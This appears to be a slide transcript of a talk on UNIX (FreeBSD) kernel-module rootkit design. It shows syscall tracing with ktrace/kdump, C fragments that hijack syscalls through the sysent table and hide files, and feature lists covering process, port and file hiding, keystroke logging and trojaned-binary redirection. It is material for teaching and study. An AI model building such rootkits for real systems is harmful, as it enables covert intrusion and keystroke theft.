Tripwyre
Published in: Technology, Education
Transcript

  • 1. UNIX Rootkits – Design and Implementation Satish Srinivasan sathya@freeshell.org twitter.com/tripwyre
  • 2. Overview of Presentation
    * Why LKM Rootkits?
    * Rootkit Design
    * How Hooking Works?
    * Identifying System Calls
    * Hijacking System Calls
    * Implementing System Calls
    * System Calls to Hijack
  • 3. Why LKM Rootkits?
    * Direct Access to Kernel
    * Monitoring actions of users
    * Advanced Stealth Mechanisms
    * Monitoring intrusions on Honeypots
    * Overriding OS Protections
    * Studying proprietary protocols
    * Practical Education on OS Kernels!
  • 4. Rootkit Design (diagram: User -> User Mode Control Interface -> Loadable Kernel Module Driver -> Operating System Kernel; the user-mode side is labelled "User", the kernel side "System")
  • 5. How Hooking Works? (diagram: Normal Execution: User Mode Program -> System Call Function; Hooked Execution: User Mode Program -> Our Hooked System Call -> System Call Function)
  • 6. Identifying System Calls (Kernel Process Tracing)
    * kdump – Dump a part or all of the kernel memory to analyze the calling of system calls in the user-mode programs.
    * ktrace – Trace the execution of the program to find the system calls it calls and the operations it does.
  • 7. Using ktrace and kdump

```
$ ktrace who
exampleuser ttyv0 Jan 28 21:36
exampleuser ttyp0 Jan 28 21:45 (10.0.0.3)
$ kdump
548 ktrace RET ktrace 0
548 ktrace CALL execve(0xbfbfe7e0,0xbfbfed2c,0xbfbfed34)
548 ktrace NAMI "/usr/bin/who"
548 ktrace NAMI "/libexec/ld-elf.so.1"
548 who RET execve 0
548 who CALL mmap(0,0xe18,0x3,0x1000,0xffffffff,0,0,0)
548 who RET mmap 671535104/0x2806d000
548 who CALL munmap(0x2806d000,0xe18)
548 who RET munmap 0
548 who CALL __sysctl(0xbfbfead8,0x2,0x28069998,0xbfbfead4,0,0)
548 who RET __sysctl 0
548 who CALL mmap(0,0x8000,0x3,0x1002,0xffffffff,0,0,0)
548 who RET mmap 671535104/0x2806d000
548 who CALL issetugid
548 who RET issetugid 0
548 who CALL open(0x28065c28,0,0x1b6)
548 who NAMI "/etc/libmap.conf"
548 who RET open -1 errno 2 No such file or directory
548 who CALL open(0x28064e80,0,0)
548 who NAMI "/var/run/ld-elf.so.hints"
548 who RET open 3
548 who CALL read(0x3,0xbfbfeaa0,0x80)
548 who GIO fd 3 read 128 bytes
```

  • 8. (continued)

```
...
548 who RET mprotect 0
548 who CALL mmap(0,0x56c0,0x3,0x1000,0xffffffff,0,0,0)
548 who RET mmap 672452608/0x2814d000
548 who CALL munmap(0x2814d000,0x56c0)
548 who RET munmap 0
548 who CALL mprotect(0x28075000,0xc0000,0x5)
548 who RET mprotect 0
548 who CALL sigprocmask(0x1,0x28068820,0xbfbfeb20)
548 who RET sigprocmask 0
548 who CALL sigprocmask(0x3,0x28068830,0)
548 who RET sigprocmask 0
548 who CALL open(0x8049520,0,0x1b6)
548 who NAMI "/var/run/utmp"
548 who RET open 3
548 who CALL fstat(0x3,0xbfbfead0)
...
548 who RET read 748/0x2ec
548 who CALL fstat(0x1,0xbfbfe330)
548 who RET fstat 0
548 who CALL break(0x804e000)
548 who RET break 0
548 who CALL ioctl(0x1,TIOCGETA,0xbfbfe370)
548 who RET ioctl 0
548 who CALL access(0x2813318c,0x4)
548 who NAMI "/etc/localtime"
548 who RET access 0
548 who CALL open(0x2813318c,0,0)
548 who NAMI "/etc/localtime"
...
```

  • 9. (continued)

```
...
548 who CALL fstat(0x4,0xbfbfea50)
548 who RET fstat 0
548 who CALL read(0x4,0xbfbfc730,0x1f08)
548 who GIO fd 4 read 109 bytes
       0x0000 545a 6966 0000 0000 0000 0000 0000 0000  |TZif............|
       0x0010 0000 0000 0000 0004 0000 0004 0000 0000  |................|
       0x0020 0000 0004 0000 0004 0000 000d cadb 86b0  |................|
       0x0030 cc05 7118 cc95 32a8 d274 1298 0102 0302  |..q...2..t......|
       0x0040 0000 52d0 0000 0000 5b68 0004 0000 4d58  |..R.....[h....MX|
       0x0050 0009 0000 5b68 0109 484d 5400 4255 5254  |....[h..HMT.BURT|
       0x0060 0049 5354 0000 0000 0000 0000 00         |.IST.........|
548 who RET read 109/0x6d
548 who CALL close(0x4)
548 who RET close 0
548 who CALL write(0x1,0x804d000,0x28)
548 who GIO fd 1 wrote 40 bytes
       "exampleuser ttyv0 Jan 28 21:36 "
548 who RET write 40/0x28
548 who CALL write(0x1,0x804d000,0x32)
548 who GIO fd 1 wrote 50 bytes
       "exampleuser ttyp0 Jan 28 21:45 (10.0.0.3) "
548 who RET write 50/0x32
548 who CALL read(0x3,0x804c000,0x1000)
548 who GIO fd 3 read 0 bytes
       ""
548 who RET read 0
548 who CALL close(0x3)
548 who RET close 0
548 who CALL exit(0)
```
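As an added example that is not part of the slides: a small Python parser for the kdump record shapes shown above (CALL, NAMI, RET), which counts the system calls a traced program makes and attributes each NAMI path to the call that resolved it, together with that call's return value. The parser and the SAMPLE lines (copied from the excerpt above) are my own, not the presenter's code.

```python
import re
from collections import Counter

# kdump record shapes on the slides: "<pid> <comm> CALL name(args)", "<pid> <comm> RET name value[/0x..] [errno N msg]", '<pid> <comm> NAMI "path"'
CALL_RE = re.compile(r'^\d+\s+\S+\s+CALL\s+(\w+)')
RET_RE = re.compile(r'^\d+\s+\S+\s+RET\s+(\w+)\s+(-?\d+)(?:/0x[0-9a-f]+)?(?:\s+errno\s+(\d+)\s+(.*))?$')
NAMI_RE = re.compile(r'^\d+\s+\S+\s+NAMI\s+"(.*)"$')

def parse_kdump(lines):
    """Return (Counter of syscall names, list of (syscall, path, return value)).
    Each NAMI record is attributed to the preceding CALL; the matching RET supplies the result."""
    counts = Counter()
    paths = []
    current = None            # (syscall name, [paths]) of the CALL still awaiting its RET
    for line in lines:
        line = line.strip()
        m = CALL_RE.match(line)
        if m:
            counts[m.group(1)] += 1
            current = (m.group(1), [])
            continue
        m = NAMI_RE.match(line)
        if m and current is not None:
            current[1].append(m.group(1))
            continue
        m = RET_RE.match(line)
        if m and current is not None and m.group(1) == current[0]:
            for p in current[1]:
                paths.append((current[0], p, int(m.group(2))))
            current = None
    return counts, paths

# Sample input: lines copied from the kdump excerpt on the slides (GIO records are ignored by the parser).
SAMPLE = """548 ktrace CALL execve(0xbfbfe7e0,0xbfbfed2c,0xbfbfed34)
548 ktrace NAMI "/usr/bin/who"
548 ktrace NAMI "/libexec/ld-elf.so.1"
548 who RET execve 0
548 who CALL open(0x28065c28,0,0x1b6)
548 who NAMI "/etc/libmap.conf"
548 who RET open -1 errno 2 No such file or directory
548 who CALL open(0x8049520,0,0x1b6)
548 who NAMI "/var/run/utmp"
548 who RET open 3
548 who CALL write(0x1,0x804d000,0x28)
548 who RET write 40/0x28
548 who CALL exit(0)""".splitlines()

if __name__ == "__main__":
    counts, paths = parse_kdump(SAMPLE)
    print(dict(counts), paths)
```

Running the same pass over a baseline trace and over a trace taken on a suspect host makes it easy to spot a changed syscall footprint, such as a file that who(1) no longer reads.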
  • 10. Hijacking System Calls

```c
#include <sys/syscall.h>
#include <sys/kernel.h>
#include <sys/sysent.h>
#include <sys/module.h>

void load(struct module *module, int cmd, void *args)
{
    switch (cmd) {
    case MOD_LOAD:
        /* System Call Hooking; Example read() syscall. */
        sysent[SYS_read].sy_call = (sys_call_t *) hooked_read;
        break;
    case MOD_UNLOAD:
        /* System Call Restore; Example getdirentries() syscall */
        sysent[SYS_getdirentries].sy_call = (sys_call_t *) getdirentries;
        break;
    }
}
```
  • 11. Implementing System Calls

```c
/* Example: Hooking chflags(2) */
int hooked_chflags(struct thread *td, void *syscall_args)
{
    struct chflags_args *uap;
    uap = (struct chflags_args *) syscall_args;
    char name[NAME_MAX];
    size_t size;

    if (copyinstr(uap->path, name, NAME_MAX, &size) == EFAULT)
        return (EFAULT);
    if (file_hidden(name))
        return (ENOENT);
    return (chflags(td, syscall_args));
}
```
  • 12. System Calls To Hijack
    * open, stat, chflags : File Hiding
    * chmod, chown : Change ownership
    * getdirentries : List Directories
    * read, write, writev : Keylogging
    * kill, fork : Process Hiding
    * ...
  • 13. Feature List
    * Hide itself from kldstat(1)
    * Hide a port from netstat(1)
    * Hide files and directories
    * Monitor network for ICMP messages
    * Capture user keystrokes
    * Hide a process from ps(1)
  • 14. Feature List (contd.)
    * execve(1) redirection for Trojan'ed binaries
    * Hide a user from who(1)
    * Controller Mechanism with Authentication using crypt(3)
    * AES Encryption for Keylogs
  • 15. Thank You!
